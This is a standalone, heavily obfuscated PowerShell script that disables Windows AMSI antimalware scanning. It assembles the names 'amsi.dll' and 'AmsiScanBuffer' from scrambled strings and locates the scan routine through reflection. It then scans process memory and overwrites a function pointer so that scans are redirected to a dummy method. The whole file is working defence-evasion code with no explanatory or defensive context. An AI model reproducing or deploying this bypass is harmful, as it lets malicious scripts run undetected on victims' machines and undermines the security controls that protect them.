function Magic {

param(
    ${In`iti`AlsTArt} = 0x50000,
    ${nE`g`A`TIVeofFSET}= 0x50000,
    
    ${m`A`xOffs`et} = 0x1000000,
    ${reA`dByT`Es} = 0x50000
)

${ap`Is} = @"
using System;
using System.ComponentModel;
using System.Management.Automation;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;

public class APIs {
    [DllImport("kernel32.dll")]
    public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UInt32 nSize, ref UInt32 lpNumberOfBytesRead);

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();

    [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
   
    [DllImport("kernel32.dll", CharSet=CharSet.Auto)]
    public static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.LPWStr)] string lpModuleName);

    [MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)]
    public static int Dummy() {
     return 1;
    }
}
"@

Add-Type ${ap`iS}

${iNiT`I`A`lDATe}=Get-Date;

${St`R`ING} = ("{1}{2}{3}{0}"-f 'ld','h','ello, w','or')
${S`TrI`NG} = ${St`RInG}.replace('he','a')
${S`T`Ring} = ${St`R`iNg}.replace('ll','m')
${Stri`Ng} = ${S`T`Ring}.replace('o,','s')
${s`TR`iNg} = ${s`Tr`ing}.replace(' ','i')
${ST`RInG} = ${s`TR`ing}.replace('wo','.d')
${sTR`Ing} = ${ST`RIng}.replace('rld','ll')

${sT`Ri`Ng2} = ("{3}{2}{1}{0}"-f'orld','w',', ','hello')
${stRIn`g2} = ${S`Tri`Ng2}.replace('he','A')
${Stri`N`g2} = ${STr`InG2}.replace('ll','m')
${St`Ri`NG2} = ${s`TRInG2}.replace('o,','s')
${Str`I`Ng2} = ${s`TRIng2}.replace(' ','i')
${str`Ing2} = ${strIn`G2}.replace('wo','Sc')
${Str`in`G2} = ${St`Ri`NG2}.replace('rld','an')

${stri`Ng3} = ("{3}{1}{0}{2}"-f ' ','llo,','world','he')
${S`TRiN`g3} = ${s`TrIn`g3}.replace(("{0}{1}"-f'h','ello'),'Bu')
${sT`R`inG3} = ${ST`R`inG3}.replace(', ','ff')
${St`Rin`G3} = ${s`TRIn`G3}.replace(("{0}{1}" -f 'worl','d'),'er')

${Addr`E`sS} = [APIS]::GetModuleHandle(${stRi`NG})
[IntPtr] ${fU`N`CaDdR} = [APIS]::GetProcAddress(${a`dDr`EsS}, ${sT`Ri`NG2} + ${stR`iNg3})

${a`SSEmB`lieS} = [appdomain]::currentdomain.getassemblies()
${AS`sEMBl`I`ES} |
  ForEach-Object {
    if(${_}.Location -ne ${n`ULl}){
     ${spl`i`T1} = ${_}.FullName.Split(",")[0]
     If(${S`p`LiT1}.StartsWith('S') -And ${S`Plit1}.EndsWith('n') -And ${sPL`iT1}.Length -eq 28) {
       ${t`yP`es} = ${_}.GetTypes()
     }
    }
}
${t`YPES} |
  ForEach-Object {
    if(${_}.Name -ne ${Nu`LL}){
     If(${_}.Name.StartsWith('A') -And ${_}.Name.EndsWith('s') -And ${_}.Name.Length -eq 9) {
       ${Me`T`hodS} = ${_}.GetMethods([System.Reflection.BindingFlags]("{3}{0}{2}{1}" -f 'at','c,NonPublic','i','St'))
     }
    }
}



${mE`TH`ods} |
  ForEach-Object {
    if(${_}.Name -ne ${N`ULL}){
     If(${_}.Name.StartsWith('S') -And ${_}.Name.EndsWith('t') -And ${_}.Name.Length -eq 11) {
       ${METh`OD`Fo`UND} = ${_}
     }
    }
}



[IntPtr] ${M`eT`HO`DpOintER} = ${mEt`H`oDFouNd}.MethodHandle.GetFunctionPointer()
[IntPtr] ${Han`dle} = [APIs]::GetCurrentProcess()

${D`UMmy} = 0

${APIre`Tu`RN} = ${Fa`lSe}
   
:initialloop for(${j} = ${I`N`ITIalSt`ArT}; ${j} -lt ${M`A`x`oFfSet}; ${J} += ${NEG`AtI`V`eO`FfSEt}){
    [IntPtr] ${mE`T`ho`DpoIntEr`ToSeA`RCH} = [Int64] ${Met`H`Od`pO`iNtER} - ${j}
    ${Rea`dEdMeMor`y`ARraY} = [byte[]]::new(${rEAD`By`TeS})
    ${A`pire`TU`Rn} = [APIs]::ReadProcessMemory(${HanD`LE}, ${m`EthOdP`o`in`TerToS`earCh}, ${Re`ADedM`EMOr`yA`RrAy}, ${r`e`ADb`ytES},[ref]${D`UMMy})
    for (${I} = 0; ${I} -lt ${reaDE`DmeMO`RyaRR`AY}.Length; ${I} += 1) {
     ${B`yt`eS} = [byte[]](${re`Ad`edMEmorya`RRAY}[${i}], ${ReA`ded`me`moRYARrAY}[${I} + 1], ${rEADedm`eM`orYarR`AY}[${I} + 2], ${r`E`AdEd`MEmoRYa`RrAy}[${I} + 3], ${R`E`ADEdmemoRyArr`Ay}[${I} + 4], ${rE`AdedMeMOr`YARR`AY}[${I} + 5], ${ReaD`ED`MEMORYa`RRAy}[${I} + 6], ${r`ea`DED`meMOrYarRay}[${i} + 7])
     [IntPtr] ${P`OI`NTertocOmp`Are} = [bitconverter]::ToInt64(${Byt`ES},0)
     if (${P`OI`NTeRTOc`OMPare} -eq ${fUNCa`d`dr}) {
       Write-Host "Found @ $($i)! "
       [IntPtr] ${me`M`ORytopat`CH} = [Int64] ${METhoDp`O`I`NTerTos`eAr`Ch} + ${i}
       break initialloop
     }
    }
}
[IntPtr] ${Dumm`y`pOi`NteR} = [APIs].GetMethod(("{1}{0}" -f'my','Dum')).MethodHandle.GetFunctionPointer()

${b`UF} = [IntPtr[]] (${D`Umm`YpoI`NteR})




[System.Runtime.InteropServices.Marshal]::Copy(${b`Uf}, 0, ${meMOry`ToP`AtcH}, 1)



${fI`N`ISHDA`Te}=Get-Date;
${T`ImEeLA`ps`eD} = (${Fi`NIS`hdAtE} - ${InItI`Al`D`Ate}).TotalSeconds;
Write-Host ("$TimeElapsed "+'secon'+'d'+'s')
}